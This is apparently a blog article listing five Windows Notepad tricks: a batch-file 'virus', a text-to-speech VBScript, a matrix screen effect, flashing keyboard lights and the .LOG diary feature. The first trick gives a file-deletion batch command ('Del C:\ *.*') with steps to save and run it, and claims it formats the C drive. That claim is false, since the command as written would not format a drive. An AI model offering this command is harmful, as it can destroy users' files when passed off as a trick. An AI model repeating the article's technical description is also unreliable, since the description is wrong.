Best Notepad Tricks Probably You Never Heard of

Notepad is the plain text editor which is very comfortable in creating basic text files. They are saved as .txt files which have no format of tags or styles and this type of notepad environment is used to write a source code in it in which suitable for editing system files to use in a DOS environment.

Notepad is not just a simple and plain text creating software it is a powerful one which we can use to create different types of hack commands, opening many extensions files and also creating own batch file programs. Here we are sharing top five notepad tricked which we summed up follow them carefully

Creating a Virus

01NotepadTricks_CreatingVirus_InfoMazzaDotCom

This is the most powerful and top tricks in the notepad which we can create a dangerous virus that will format your Windows C drive

  • Open the Notepad from your windows system
  • Paste the below code given

  • @Echo off
    Del C:\ *.* |y

  • After pasting the code save the file as “.BAT”
  • Now to format your C drive just open this file.

Make Your PC Speak

02NotepadTricks_MakeYourPCSpeak_InfoMazzaDotCom

This trick is too funny and easy to create which we just have to paste a code, by this we can make our system speak that what we are typing.So, follow the below steps

  • Open the Notepad from your windows system
  • Paste the below code given

  • Dim message, sapi
    message=InputBox(“What do you want me to say?”,”ATT Text To Speak”)
    Set sapi=CreateObject(“sapi.spvoice”)
    sapi.Speak message

  • After pasting the code save the file as “.VBS”
  • Now, open the saved file then a window opens which you have to type anything you want and press OK button then your system speaks.

Matrix Effect

03NotepadTricks_MatrixEffect_InfoMazzaDotCom

Follow the below steps carefully to create a matrix like effects in your Notepad

  • Open the Notepad from your windows system
  • Paste the below code given

  • @echo off
    color 02
    :start
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto start

  • After pasting the code save the file as “.BAT”
  • Then open the saved to see the matrix effect.

Make Your Keyboard Lights Dance

04NotepadTricks_KeyboardLightsDance_InfoMazzaDotCom

This trick will make your keyboard’s three lights (Num Lock, Caps Lock, Scroll Lock) on and off randomly in which these will create a dancing light effect. Follow the below steps given below

  • Open the Notepad from your windows system
  • Paste the below code given

  • Set wshShell =wscript.CreateObject(“WScript.Shell”)
    do
    wscript.sleep 100
    wshshell.sendkeys “{CAPSLOCK}”
    wshshell.sendkeys “{NUMLOCK}”
    wshshell.sendkeys “{SCROLLLOCK}”
    loop

  • After pasting the code save the file as “.VBS”
  • Then open your saved file which you can experience the amazing dancing light effect.

Create Your Diary

05NotepadTricks_MakeDiary_InfoMazzaDotCom

This the most important trick and people having habit of writing Diary will love this. It creates your own diary in which if we write any information in it is saved automatically with date and time. Follow the below steps given below to create your diary

  • Open the Notepad from your windows system
  • Here no code is pasted just type “.LOG” in your Notepad
  • Save the file as “.TXT”
  • That’s it this is very easy to create now, open it and write anything it will be saved automatically with date and time.

Leave a Comment